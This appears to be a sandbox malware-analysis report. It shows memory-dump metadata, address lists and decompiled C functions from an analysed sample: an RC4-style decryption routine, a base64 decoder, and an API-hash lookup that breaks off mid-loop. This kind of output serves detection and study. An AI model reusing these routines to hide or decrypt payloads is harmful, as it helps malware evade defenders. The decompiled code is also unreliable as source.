0x003b69a3
0x003b69a9
0x003b6a5b
0x003b6a5d
0x00000000
0x003b69b7
0x003b69bc
0x003b69c2
0x003b69c5
0x003b69ca
0x003b69cf
0x003b69d5
0x003b69e0
0x003b6b67
0x00000000
0x003b69e6
0x003b69e8
0x003b6a15
0x003b6a1a
0x003b6a20
0x003b6a24
0x003b6b3e
0x003b6b49
0x003b6b4f
0x003b6b4f
0x003b6b3e
0x003b6a2c
0x00000000
0x003b6a2e
0x003b6a35
0x003b6a38
0x00000000
0x003b6a38
0x003b69ea
0x003b69ea
0x003b69ea
0x003b69ec
0x003b69ee
0x003b69fc
0x003b69fd
0x003b6a03
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6a03
0x003b6b56
0x003b6b5c
0x003b6a3d
0x003b6a3f
0x003b6a52
0x003b6a52
0x003b6a64
0x003b6a66
0x003b6a73
0x003b6c06
0x003b6c1e
0x003b6c24
0x003b6c24
0x003b6c08
0x003b6c08
0x003b6c08
0x003b6a79
0x003b6a79
0x003b6a81
0x003b6ba3
0x003b6ba8
0x003b6bb4
0x003b6bb6
0x003b6bbb
0x003b6bc1
0x003b6bc3
0x003b6bc8
0x003b6bcc
0x003b6bd3
0x003b6bd6
0x003b6bd9
0x003b6bdc
0x003b6bdc
0x003b6bdf
0x003b6bbd
0x003b6bbd
0x003b6bbd
0x003b6be9
0x003b6bef
0x003b6a87
0x003b6a87
0x003b6a87
0x003b6a8f
0x003b6a91
0x003b6a91
0x003b6a93
0x003b6a93
0x003b6a9b
0x00000000
0x00000000
0x003b6a9d
0x003b6a9f
0x003b6a9f
0x003b6aa7
0x00000000
0x00000000
0x00000000
0x003b6aa7
0x003b6a91
0x003b6a8f
0x003b6aa9
0x003b6aa9
0x003b6aab
0x003b6aad
0x003b6ab8
0x003b6ab9
0x003b6abf
0x00000000
0x003b6ac1
0x003b6ac1
0x003b6acb
0x003b6acd
0x003b6ad2
0x003b6ad8
0x003b6ada
0x003b6adf
0x003b6ae3
0x003b6aea
0x003b6aed
0x003b6af0
0x003b6af3
0x003b6af3
0x003b6af6
0x003b6ad4
0x003b6ad4
0x003b6ad4
0x003b6b0e
0x003b6b11
0x003b6b1d
0x003b6b20
0x003b6b26
0x003b6b26
0x00000000
0x003b6abf
0x003b6b76
0x003b6b78
0x003b6b85
0x003b6b88
0x003b6b94
0x003b6b97
0x003b6b97
0x003b6a73
0x003b696b
0x003b6977
0x003b6a41
0x003b6a4b
0x003b6a4c
0x003b6a4e
0x003b6a4f
0x003b6a50
0x003b6a51
0x003b6a51
0x003b6b62
0x00000000
0x003b6b62
0x00000000
0x003b6a05
0x003b6a05
0x003b6a0b
0x003b6a0b
0x003b6a11
0x00000000
0x003b69ea
0x003b69e8
0x003b69e0
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6940
0x003b6951
0x003b6958
0x00000000
0x003b68e5
0x003b68b4
0x003b6844
0x003b684e
0x003b684e
0x00000000
0x00000000
0x00000000
0x003b680c
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf70abd3f31b7fb2824d667f9a096a1c3acb5eaea34898843833eee2b9e5b13
Instruction ID: 041d302039496abb0029d77393dc81ccff577bea2720f69b4ae724094cfc47bb
Opcode Fuzzy Hash: 8cf70abd3f31b7fb2824d667f9a096a1c3acb5eaea34898843833eee2b9e5b13
Instruction Fuzzy Hash: 73C10370608345CBDB36DF55D4927AAB7E4BB8430CF11C42ECA89CBA03EB789845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003CDCA0, Relevance: .3, Instructions: 297
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E003CDCA0(signed int __ecx, signed int __edx) {
				void* __esi;
				signed int _t179;
				signed int _t180;
				signed int _t182;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t210;
				void* _t234;
				signed int _t238;
				signed int _t244;
				signed int _t246;
				signed int _t255;
				signed char _t257;
				signed int _t258;
				signed int _t259;
				signed int _t265;
				signed int _t266;
				signed int _t270;
				signed int _t271;
				signed char _t273;
				signed int _t275;
				signed int _t276;
				signed char _t278;
				signed int _t280;
				signed int _t283;
				void* _t285;
				void* _t286;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				signed int _t299;
				signed int* _t304;
				signed int _t305;
				void* _t306;
				void* _t307;
				signed int _t308;
				signed int* _t311;

				_t203 = __edx;
				_t295 = __ecx;
				if(E003C9650(__edx) > 0x24) {
					E003C9850(__edx,  &(_t311[2]), 0x10);
					_t311[1] = E003C9A90(_t203, __ecx);
					_t285 = E003C9640( &(_t311[3]), 0);
					if(_t285 != 0) {
						if(E003CD620(_t285, 0x10) == 0xd2490422) {
							_t308 = 0;
						} else {
							_t308 =  ==  ? 0 : 1;
						}
						 *_t311 = 0;
						_t188 =  *_t311;
						do {
							 *(_t311 + _t188 + 0x18) = _t188;
							 *((char*)(_t311 + _t188 + 0x118)) =  *((_t188 & 0x0000000f) + _t285) & 0x000000ff;
							_t188 = _t188 + 1;
						} while (_t188 < 0x100);
						_t189 = 0;
						 *_t311 = _t203;
						_t291 = 0;
						do {
							_t265 =  *(_t311 + 0x18 + _t291 * 2) & 0x000000ff;
							_t190 = ( *(_t311 + 0x118 + _t291 * 2) & 0x000000ff) + _t265 + _t189 & 0x000000ff;
							 *(_t311 + 0x18 + _t291 * 2) =  *(_t311 + _t190 + 0x18) & 0x000000ff;
							 *(_t311 + _t190 + 0x18) = _t265;
							_t266 =  *(_t311 + 0x19 + _t291 * 2) & 0x000000ff;
							_t189 = ( *(_t311 + 0x119 + _t291 * 2) & 0x000000ff) + _t266 + _t190 & 0x000000ff;
							 *(_t311 + 0x19 + _t291 * 2) =  *(_t311 + _t189 + 0x18) & 0x000000ff;
							_t291 = _t291 + 1;
							 *(_t311 + _t189 + 0x18) = _t266;
						} while (_t291 < 0x80);
						_t191 = _t311[6] & 0x000000ff;
						_t203 =  *_t311;
						_t311[6] =  *(_t311 + _t191 + 0x18) & 0x000000ff;
						 *(_t311 + _t191 + 0x18) = _t191;
						_t244 = (_t311[6] & 0x000000ff) + _t191 & 0x000000ff;
						_t270 = _t311[1] & 0x000000ff;
						if(_t308 != 0) {
							_t270 = _t270 ^  *(_t311 + _t244 + 0x18) & 0x000000ff;
						}
						_t311[1] = _t270;
						_t271 = _t311[6] & 0x000000ff;
						_t193 = _t191 + _t271 & 0x000000ff;
						 *_t311 = _t271;
						_t311[6] =  *(_t311 + _t193 + 0x18) & 0x000000ff;
						_t273 =  *_t311;
						 *(_t311 + _t193 + 0x18) = _t273;
						_t246 = _t273 + (_t311[6] & 0x000000ff) & 0x000000ff;
						_t275 = _t311[1] & 0x000000ff;
						if(_t308 != 0) {
							_t275 = _t275 ^  *(_t311 + _t246 + 0x18) & 0x000000ff;
						}
						_t311[1] = _t275;
						_t276 = _t311[6] & 0x000000ff;
						_t292 = _t193 + _t276 & 0x000000ff;
						 *_t311 = _t276;
						_t311[6] =  *(_t311 + _t292 + 0x18) & 0x000000ff;
						_t278 =  *_t311;
						 *(_t311 + _t292 + 0x18) = _t278;
						_t196 = _t278 + (_t311[6] & 0x000000ff) & 0x000000ff;
						_t280 = _t311[1] & 0x000000ff;
						if(_t308 != 0) {
							_t280 = _t280 ^  *(_t311 + _t196 + 0x18) & 0x000000ff;
						}
						_t197 = _t311[7] & 0x000000ff;
						_t294 = _t292 + _t197 & 0x000000ff;
						_t311[1] = _t280;
						_t311[7] =  *(_t311 + _t294 + 0x18) & 0x000000ff;
						 *(_t311 + _t294 + 0x18) = _t197;
						_t199 = _t197 + (_t311[7] & 0x000000ff) & 0x000000ff;
						_t283 = _t311[1] & 0x000000ff;
						if(_t308 != 0) {
							_t283 = _t283 ^  *(_t311 + _t199 + 0x18) & 0x000000ff;
						}
						_t311[1] = _t283;
					}
					_t311[1] = E003B0B60(_t311[1]);
					_t304 =  &(_t311[6]);
					E003C9850(_t203, _t304, 0x10);
					_push(_t304);
					E003C9520( &(_t311[3]));
					E003C9510(_t304);
					E003C9850(_t203,  &(_t311[0xa]), _t311[1]);
					_t286 = E003C9640( &(_t311[3]), 0);
					_t204 = E003C9640( &(_t311[0xb]), 0);
					_t305 = E003C9650( &(_t311[0xa]));
					_t311[0x8e] = E003C9640( &(_t311[0xb]), 0);
					if(_t286 != 0 && _t204 != 0 && _t305 != 0 && _t311[0x8e] != 0) {
						if(E003CD620(_t286, 0x10) == 0xd2490422) {
							_t234 = 0;
						} else {
							_t234 =  ==  ? 0 : 1;
						}
						 *_t311 = 0;
						_t255 =  *_t311;
						do {
							 *(_t311 + _t255 + 0x38) = _t255;
							 *((char*)(_t311 + _t255 + 0x138)) =  *((_t255 & 0x0000000f) + _t286) & 0x000000ff;
							_t255 = _t255 + 1;
						} while (_t255 < 0x100);
						_t311[1] = _t204;
						_t287 = 0;
						 *_t311 = _t295;
						_t205 = 0;
						do {
							_t179 =  *(_t311 + 0x38 + _t287 * 2) & 0x000000ff;
							_t299 = ( *(_t311 + 0x138 + _t287 * 2) & 0x000000ff) + _t179 + _t205 & 0x000000ff;
							 *(_t311 + 0x38 + _t287 * 2) =  *(_t311 + _t299 + 0x38) & 0x000000ff;
							 *(_t311 + _t299 + 0x38) = _t179;
							_t180 =  *(_t311 + 0x39 + _t287 * 2) & 0x000000ff;
							_t205 = ( *(_t311 + 0x139 + _t287 * 2) & 0x000000ff) + _t180 + _t299 & 0x000000ff;
							 *(_t311 + 0x39 + _t287 * 2) =  *(_t311 + _t205 + 0x38) & 0x000000ff;
							_t287 = _t287 + 1;
							 *(_t311 + _t205 + 0x38) = _t180;
						} while (_t287 < 0x80);
						_t210 = _t311[1];
						_t295 =  *_t311;
						if(_t305 > 0) {
							_t288 = 0;
							_t257 = 1;
							if(_t234 != 0) {
								_t311[1] = _t305;
								_t306 = 0;
								 *_t311 = _t295;
								do {
									_t258 = _t257 & 0x000000ff;
									_t182 =  *(_t311 + _t258 + 0x38) & 0x000000ff;
									_t288 = _t288 + _t182 & 0x000000ff;
									 *(_t311 + _t258 + 0x38) =  *(_t311 + _t288 + 0x38) & 0x000000ff;
									 *(_t311 + _t288 + 0x38) = _t182;
									_t257 = _t258 + 1;
									 *((char*)(_t306 + _t311[0x8e])) =  *(_t306 + _t210) & 0x000000ff ^  *(_t311 + (_t182 + ( *(_t311 + _t258 + 0x38) & 0x000000ff) & 0x000000ff) + 0x38) & 0x000000ff;
									_t306 = _t306 + 1;
								} while (_t306 < _t311[1]);
							} else {
								_t311[1] = _t305;
								_t307 = 0;
								 *_t311 = _t295;
								do {
									_t259 = _t257 & 0x000000ff;
									_t238 =  *(_t311 + _t259 + 0x38) & 0x000000ff;
									_t288 = _t288 + _t238 & 0x000000ff;
									 *(_t311 + _t259 + 0x38) =  *(_t311 + _t288 + 0x38) & 0x000000ff;
									_t257 = _t259 + 1;
									 *((char*)(_t307 + _t311[0x8e])) =  *(_t307 + _t210) & 0x000000ff;
									_t307 = _t307 + 1;
									 *(_t311 + _t288 + 0x38) = _t238;
								} while (_t307 < _t311[1]);
							}
							_t295 =  *_t311;
						}
					}
					_push( &(_t311[0xa]));
					E003C93D0(_t295);
					E003C9510( &(_t311[0xa]));
					E003C9510( &(_t311[2]));
					return _t295;
				} else {
					_push(0);
					E003C9350(__ecx);
					return __ecx;
				}
			}

0x003cdcaa
0x003cdcac
0x003cdcb8
0x003cdcd9
0x003cdce5
0x003cdcf4
0x003cdcf8
0x003cdd0f
0x003cdd22
0x003cdd11
0x003cdd1d
0x003cdd1d
0x003cdd24
0x003cdd2b
0x003cdd2e
0x003cdd33
0x003cdd3b
0x003cdd42
0x003cdd43
0x003cdd4a
0x003cdd4c
0x003cdd4f
0x003cdd60
0x003cdd60
0x003cdd71
0x003cdd79
0x003cdd7d
0x003cdd81
0x003cdd92
0x003cdd9a
0x003cdd9e
0x003cdd9f
0x003cdda3
0x003cddab
0x003cddb0
0x003cddb8
0x003cddbc
0x003cddc7
0x003cddca
0x003cddd1
0x003cddd8
0x003cddd8
0x003cddda
0x003cddde
0x003cdde5
0x003cdde8
0x003cddf0
0x003cddf4
0x003cddf7
0x003cde02
0x003cde05
0x003cde0c
0x003cde13
0x003cde13
0x003cde15
0x003cde19
0x003cde20
0x003cde23
0x003cde2b
0x003cde2f
0x003cde32
0x003cde3d
0x003cde40
0x003cde47
0x003cde4e
0x003cde4e
0x003cde50
0x003cde57
0x003cde5d
0x003cde66
0x003cde6a
0x003cde75
0x003cde78
0x003cde7f
0x003cde86
0x003cde86
0x003cde88
0x003cde88
0x003cde95
0x003cde99
0x003cdea2
0x003cdea7
0x003cdeac
0x003cdeb3
0x003cdec3
0x003cded3
0x003cdee0
0x003cdeeb
0x003cdef8
0x003cdf01
0x003cdf36
0x003cdf49
0x003cdf38
0x003cdf44
0x003cdf44
0x003cdf4b
0x003cdf52
0x003cdf55
0x003cdf5a
0x003cdf62
0x003cdf69
0x003cdf6a
0x003cdf74
0x003cdf78
0x003cdf7a
0x003cdf7d
0x003cdf80
0x003cdf80
0x003cdf91
0x003cdf9c
0x003cdfa0
0x003cdfa4
0x003cdfb5
0x003cdfbd
0x003cdfc1
0x003cdfc2
0x003cdfc6
0x003cdfce
0x003cdfd2
0x003cdfd7
0x003cdfdd
0x003cdfdf
0x003cdfe8
0x003ce02a
0x003ce02e
0x003ce030
0x003ce040
0x003ce040
0x003ce043
0x003ce04a
0x003ce055
0x003ce059
0x003ce067
0x003ce07b
0x003ce07f
0x003ce080
0x003cdfea
0x003cdfea
0x003cdfee
0x003cdff0
0x003cdff3
0x003cdff3
0x003cdffd
0x003ce004
0x003ce00f
0x003ce013
0x003ce019
0x003ce01d
0x003ce01e
0x003ce022
0x003ce028
0x003ce086
0x003ce086
0x003cdfd7
0x003ce08f
0x003ce090
0x003ce099
0x003ce0a2
0x003ce0b3
0x003cdcba
0x003cdcbc
0x003cdcbe
0x003cdccf
0x003cdccf

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19572c1b798058c94cd4207bb43ad0dad04bb55abc297bd6c07a84037ab5eab7
Instruction ID: 587d4b19811a49751af4062f0e9d5222f8ab6d57b1e7ba9d60250600e95cec81
Opcode Fuzzy Hash: 19572c1b798058c94cd4207bb43ad0dad04bb55abc297bd6c07a84037ab5eab7
Instruction Fuzzy Hash: 35C1A32120C3A14AC326AB3A94907BFFED15FE5214F198D7EF4C987293D578C984D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 003C9B10, Relevance: .3, Instructions: 292
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E003C9B10(signed int* __ecx) {
				signed int* _t87;
				signed int _t88;
				signed int _t95;
				unsigned int _t96;
				unsigned int _t97;
				signed int _t105;
				signed int _t110;
				signed int _t113;
				signed int _t115;
				char _t122;
				signed int _t128;
				signed int _t130;
				unsigned int _t135;
				unsigned int _t140;
				signed int _t141;
				unsigned int _t142;
				signed int _t143;
				signed int _t147;
				unsigned int _t148;
				signed int _t150;
				unsigned int _t155;
				unsigned int _t160;
				unsigned int _t161;
				unsigned int _t162;
				signed int* _t168;
				unsigned int _t169;
				void* _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int* _t182;
				signed int _t187;
				signed int _t190;
				signed int* _t191;
				signed int* _t192;
				void* _t193;
				signed int** _t194;

				_t168 = __ecx;
				_t182 =  *(_t193 + 0x38);
				_t137 =  *(__ecx + 0xc);
				if( *(__ecx + 0xc) != 0) {
					E003B0BC0( *((intOrPtr*)(__ecx + 8)), _t137 +  *((intOrPtr*)(__ecx + 8)),  *((intOrPtr*)(__ecx)));
					_t193 = _t193 + 0xc;
					 *(__ecx + 0xc) = 0;
				}
				_t138 = _t168[1];
				if(_t168[1] < 0x40) {
					_push(0x40);
					_t105 = E003B1030();
					E003B0C10(_t105, _t168[2],  *_t168);
					_push(1);
					_push(_t168[2]);
					E003B10B0();
					_t193 = _t193 + 0x18;
					_t168[2] = _t105;
					_t138 = 0x40;
					_t168[1] = 0x40;
				} else {
					_t105 = _t168[2];
				}
				_t175 = 0;
				 *_t168 = 0;
				E003B0B70(_t105, 0, _t138);
				_t194 = _t193 + 0xc;
				if(_t182 == 0 ||  *_t182 == 0) {
					return _t168;
				} else {
					_t194[1] = E003C6040(_t182, 0x7fffffff);
					_t140 = _t168[3];
					__eflags = _t140;
					if(_t140 != 0) {
						__eflags = _t140 + _t168[2];
						E003B0BC0(_t168[2], _t140 + _t168[2],  *_t168);
						_t194 =  &(_t194[3]);
						_t168[3] = 0;
					}
					_t141 = _t194[1];
					_t110 = (_t141 >> 5 >> 0x1a) + _t141 >> 6;
					_t142 = _t141 & 0x8000003f;
					__eflags = _t142;
					if(_t142 < 0) {
						_t142 = (_t142 - 0x00000001 | 0xffffffc0) + 1;
						__eflags = _t142;
					}
					__eflags = _t142;
					_t143 = _t175;
					_t112 =  ==  ? 1 : _t110 + (_t143 & 0xffffff00 | __eflags > 0x00000000);
					_t113 = ( ==  ? 1 : _t110 + (_t143 & 0xffffff00 | __eflags > 0x00000000)) << 6;
					__eflags = _t113 - _t168[1];
					if(_t113 > _t168[1]) {
						_push(_t113);
						_t194[1] = E003B1030();
						E003B0C10(_t194[3], _t168[2],  *_t168);
						_push(1);
						_push(_t168[2]);
						E003B10B0();
						_t194 =  &(_t194[6]);
						_t168[2] =  *_t194;
						_t168[1] = _t113;
					}
					 *_t168 = _t194[1];
					_t87 = _t182 + E003C6040(_t182, 0x7fffffff);
					_t115 = _t175;
					_t128 = _t168[2];
					_t147 =  *_t168;
					__eflags = _t182 - _t87;
					if(_t182 < _t87) {
						_t194[4] = _t175;
						_t194[8] = _t87;
						_t194[1] = _t147;
						_t194[3] = _t128;
						 *_t194 = _t168;
						goto L16;
						do {
							do {
								do {
									L16:
									_t95 = 0;
									_t130 = 0;
									_t155 = 0;
									_t194[7] = _t182;
									_t169 = 0;
									__eflags = 0;
									_t194[5] = _t115;
									_t194[6] = _t115;
									while(1) {
										_t169 = _t169 + 1;
										__eflags = _t182 - _t194[8];
										if(_t182 >= _t194[8]) {
											break;
										}
										_t192 = _t194[7];
										_t122 =  *((char*)(_t169 + _t192 - 1));
										_t182 = _t192 + _t169;
										_t179 = _t122 - 0x41;
										__eflags = _t179 - 0x19;
										if(_t179 <= 0x19) {
											L27:
											__eflags = _t179 - 0xffffffff;
											if(_t179 == 0xffffffff) {
												goto L29;
											} else {
												goto L28;
											}
										} else {
											__eflags = _t122 - 0x61 - 0x19;
											if(_t122 - 0x61 <= 0x19) {
												_t179 = _t122 - 0x47;
												goto L27;
											} else {
												__eflags = _t122 - 0x30 - 9;
												if(_t122 - 0x30 <= 9) {
													_t179 = _t122 + 4;
													goto L27;
												} else {
													__eflags = _t122 - 0x2b;
													if(_t122 == 0x2b) {
														_t179 = 0x3e;
														goto L28;
													} else {
														__eflags = _t122 - 0x2f;
														if(_t122 != 0x2f) {
															L29:
															_t155 = _t155 - 1;
															__eflags = _t155;
														} else {
															_t179 = 0x3f;
															L28:
															_t130 = _t130 + 6;
															_t95 = _t95 << 0x00000006 | _t179;
														}
													}
												}
											}
										}
										_t155 = _t155 + 1;
										__eflags = _t155 - 4;
										if(_t155 < 4) {
											continue;
										}
										break;
									}
									_t178 = _t194[5];
									_t115 = _t194[6];
									_t160 = (_t130 >> 2 >> 0x1d) + _t130 >> 3;
									_t96 = _t95 <<  ~_t130 + 0x18;
									__eflags = _t194[4];
									if(_t194[4] != 0) {
										__eflags = _t160;
										if(_t160 > 0) {
											goto L45;
										} else {
											goto L43;
										}
									} else {
										__eflags = _t115 + _t160 - _t194[1];
										_t172 =  >  ? 1 : 0;
										_t194[4] =  >  ? 1 : 0;
										__eflags = _t160;
										if(_t160 <= 0) {
											goto L43;
										} else {
											__eflags = _t194[4];
											if(_t194[4] != 0) {
												L45:
												_t97 = 0;
												__eflags = 0;
												do {
													_t97 = _t97 + 1;
													__eflags = _t97 - _t160;
												} while (_t97 < _t160);
												goto L47;
											} else {
												_t135 = _t160 >> 1;
												__eflags = _t135;
												if(_t135 == 0) {
													_t173 = 1;
												} else {
													_t194[2] = _t182;
													_t174 = 0;
													__eflags = 0;
													_t194[5] = _t178;
													_t194[6] = _t115;
													_t191 = _t194[3];
													do {
														_t174 = _t174 + 1;
														 *_t191 = _t96 >> 0x10;
														_t191[0] = (_t96 & 0x00ffff00) >> 8;
														_t191 =  &(_t191[0]);
														_t96 = _t96 << 0x10;
														__eflags = _t174 - _t135;
													} while (_t174 < _t135);
													_t194[3] = _t191;
													_t178 = _t194[5];
													_t115 = _t194[6] + _t174 * 2;
													_t182 = _t194[2];
													_t173 = _t174 + _t174 + 1;
												}
												goto L38;
											}
										}
									}
									goto L48;
									L43:
									__eflags = _t182 - _t194[8];
								} while (_t182 < _t194[8]);
								break;
								L47:
								_t115 = _t115 + _t97;
								__eflags = _t182 - _t194[8];
							} while (_t182 < _t194[8]);
							L48:
							_t168 =  *_t194;
							_t175 = 0;
							__eflags = 0;
							goto L49;
							L38:
							_t63 = _t173 - 1; // 0x0
							__eflags = _t63 - _t160;
							if(_t63 < _t160) {
								_t161 = _t194[3];
								_t115 = _t173 + _t178;
								 *_t161 = _t96 >> 0x10;
								_t162 = _t161 + 1;
								__eflags = _t162;
								_t194[3] = _t162;
							}
							__eflags = _t182 - _t194[8];
						} while (_t182 < _t194[8]);
						goto L48;
					}
					L49:
					_t148 = _t168[3];
					__eflags = _t148;
					if(_t148 != 0) {
						__eflags = _t148 + _t168[2];
						E003B0BC0(_t168[2], _t148 + _t168[2],  *_t168);
						_t194 =  &(_t194[3]);
						_t168[3] = 0;
					}
					_t187 = (_t115 >> 5 >> 0x1a) + _t115 >> 6;
					_t150 = _t115 & 0x8000003f;
					__eflags = _t150;
					if(_t150 < 0) {
						_t150 = (_t150 - 0x00000001 | 0xffffffc0) + 1;
						__eflags = _t150;
					}
					__eflags = _t150;
					_t88 = _t175;
					_t189 =  ==  ? 1 : _t187 + (_t88 & 0xffffff00 | __eflags > 0x00000000);
					_t190 = ( ==  ? 1 : _t187 + (_t88 & 0xffffff00 | __eflags > 0x00000000)) << 6;
					__eflags = _t190 - _t168[1];
					if(_t190 > _t168[1]) {
						_push(_t190);
						_t176 = E003B1030();
						E003B0C10(_t176, _t168[2],  *_t168);
						_push(1);
						_push(_t168[2]);
						E003B10B0();
						_t168[2] = _t176;
						_t168[1] = _t190;
					}
					 *_t168 = _t115;
					return _t168;
				}
			}

0x003c9b17
0x003c9b19
0x003c9b1d
0x003c9b22
0x003c9b2d
0x003c9b32
0x003c9b35
0x003c9b35
0x003c9b3c
0x003c9b42
0x003c9b49
0x003c9b50
0x003c9b58
0x003c9b5d
0x003c9b5f
0x003c9b62
0x003c9b67
0x003c9b6a
0x003c9b6d
0x003c9b72
0x003c9b44
0x003c9b44
0x003c9b44
0x003c9b7a
0x003c9b7e
0x003c9b80
0x003c9b85
0x003c9b8a
0x003c9b9b
0x003c9b9e
0x003c9baa
0x003c9bae
0x003c9bb1
0x003c9bb3
0x003c9bb8
0x003c9bbe
0x003c9bc3
0x003c9bc6
0x003c9bc6
0x003c9bcd
0x003c9bdb
0x003c9bde
0x003c9bde
0x003c9be4
0x003c9bec
0x003c9bec
0x003c9bec
0x003c9bed
0x003c9bef
0x003c9bfb
0x003c9bfe
0x003c9c01
0x003c9c04
0x003c9c06
0x003c9c0c
0x003c9c19
0x003c9c1e
0x003c9c20
0x003c9c23
0x003c9c28
0x003c9c2e
0x003c9c31
0x003c9c31
0x003c9c3f
0x003c9c46
0x003c9c48
0x003c9c4a
0x003c9c4d
0x003c9c4f
0x003c9c51
0x003c9c57
0x003c9c5b
0x003c9c5f
0x003c9c63
0x003c9c67
0x003c9c67
0x003c9c6a
0x003c9c6a
0x003c9c6a
0x003c9c6a
0x003c9c6a
0x003c9c6e
0x003c9c70
0x003c9c72
0x003c9c76
0x003c9c76
0x003c9c78
0x003c9c7c
0x003c9c80
0x003c9c80
0x003c9c81
0x003c9c85
0x00000000
0x00000000
0x003c9c87
0x003c9c8b
0x003c9c90
0x003c9c92
0x003c9c95
0x003c9c98
0x003c9cca
0x003c9cca
0x003c9ccd
0x00000000
0x00000000
0x00000000
0x00000000
0x003c9c9a
0x003c9c9d
0x003c9ca0
0x003c9cc7
0x00000000
0x003c9ca2
0x003c9ca5
0x003c9ca8
0x003c9cc2
0x00000000
0x003c9caa
0x003c9caa
0x003c9cad
0x003c9cbb
0x00000000
0x003c9caf
0x003c9caf
0x003c9cb2
0x003c9cd9
0x003c9cd9
0x003c9cd9
0x003c9cb4
0x003c9cb4
0x003c9ccf
0x003c9cd2
0x003c9cd5
0x003c9cd5
0x003c9cb2
0x003c9cad
0x003c9ca8
0x003c9ca0
0x003c9cda
0x003c9cdb
0x003c9cde
0x00000000
0x00000000
0x00000000
0x003c9cde
0x003c9ce0
0x003c9ce4
0x003c9cf7
0x003c9cfa
0x003c9cfc
0x003c9d01
0x003c9daa
0x003c9dac
0x00000000
0x00000000
0x00000000
0x00000000
0x003c9d07
0x003c9d0f
0x003c9d18
0x003c9d1b
0x003c9d1f
0x003c9d21
0x00000000
0x003c9d27
0x003c9d27
0x003c9d2c
0x003c9dba
0x003c9dba
0x003c9dba
0x003c9dbc
0x003c9dbc
0x003c9dbd
0x003c9dbd
0x00000000
0x003c9d32
0x003c9d34
0x003c9d34
0x003c9d36
0x003c9e5c
0x003c9d3c
0x003c9d3c
0x003c9d40
0x003c9d40
0x003c9d42
0x003c9d46
0x003c9d4a
0x003c9d4e
0x003c9d50
0x003c9d54
0x003c9d62
0x003c9d65
0x003c9d68
0x003c9d6b
0x003c9d6b
0x003c9d6f
0x003c9d77
0x003c9d7b
0x003c9d7e
0x003c9d82
0x003c9d82
0x00000000
0x003c9d36
0x003c9d2c
0x003c9d21
0x00000000
0x003c9dae
0x003c9dae
0x003c9dae
0x00000000
0x003c9dc1
0x003c9dc1
0x003c9dc3
0x003c9dc3
0x003c9dcd
0x003c9dcd
0x003c9dd0
0x003c9dd0
0x00000000
0x003c9d86
0x003c9d86
0x003c9d89
0x003c9d8b
0x003c9d8d
0x003c9d91
0x003c9d97
0x003c9d99
0x003c9d99
0x003c9d9a
0x003c9d9a
0x003c9d9e
0x003c9d9e
0x00000000
0x003c9da8
0x003c9dd2
0x003c9dd2
0x003c9dd5
0x003c9dd7
0x003c9ddc
0x003c9de2
0x003c9de7
0x003c9dea
0x003c9dea
0x003c9dfd
0x003c9e00
0x003c9e00
0x003c9e06
0x003c9e0e
0x003c9e0e
0x003c9e0e
0x003c9e0f
0x003c9e11
0x003c9e1d
0x003c9e20
0x003c9e23
0x003c9e26
0x003c9e28
0x003c9e2e
0x003c9e36
0x003c9e3b
0x003c9e3d
0x003c9e40
0x003c9e48
0x003c9e4b
0x003c9e4b
0x003c9e4e
0x003c9e59
0x003c9e59

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3f2147b2cc6a45cacde8172b76a812e1dc6d3a0f11a4114b2f5da289a2e1a0
Instruction ID: e723d890a6a8583d43bafc15da42ce8cf234c6d536eadd51e7504ea055eddd81
Opcode Fuzzy Hash: 2b3f2147b2cc6a45cacde8172b76a812e1dc6d3a0f11a4114b2f5da289a2e1a0
Instruction Fuzzy Hash: 76A12372A04306ABC705EF19CC84B5AF7A2FFC4304F16CA2EE95997705E771AD618B81

Uniqueness

Uniqueness Score: -1.00%

Function 003B7564, Relevance: .3, Instructions: 278
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E003B7564(signed int __eax) {
				intOrPtr _t62;
				intOrPtr _t63;
				signed int _t64;
				signed int _t65;
				signed int _t70;
				signed int _t78;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				intOrPtr _t94;
				signed int _t103;
				char _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				void* _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr* _t127;
				signed int _t128;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				intOrPtr _t134;
				signed int* _t135;
				signed int* _t136;

				_t90 = __eax;
				_t107 =  *0x3db204; // 0x26607d0
				if(_t107 == 0x431d5cea) {
					 *0x3db204 = 0;
					__eflags = __eax - 0x588ab3ea;
					if(__eax != 0x588ab3ea) {
						goto L10;
					} else {
						_t87 =  *0x3db20c; // 0x77120000
						__eflags = _t87 - 0xc62baa87;
						if(_t87 != 0xc62baa87) {
							goto L3;
						} else {
							goto L10;
						}
					}
				} else {
					if(__eax != 0x588ab3ea) {
						L4:
						__eflags = _t107;
						if(_t107 == 0) {
							L10:
							__eflags = _t90 - 0xe5ab9b45;
							goto L11;
						} else {
							while(1) {
								L5:
								__eflags = _t90 - 0xe5ab9b45;
								if(__eflags == 0) {
									break;
								} else {
									_t106 = 0;
									_t88 = 0;
									__eflags = 0;
									goto L7;
								}
								while(1) {
									L7:
									__eflags = _t90 -  *((intOrPtr*)(_t88 + _t107 + 8));
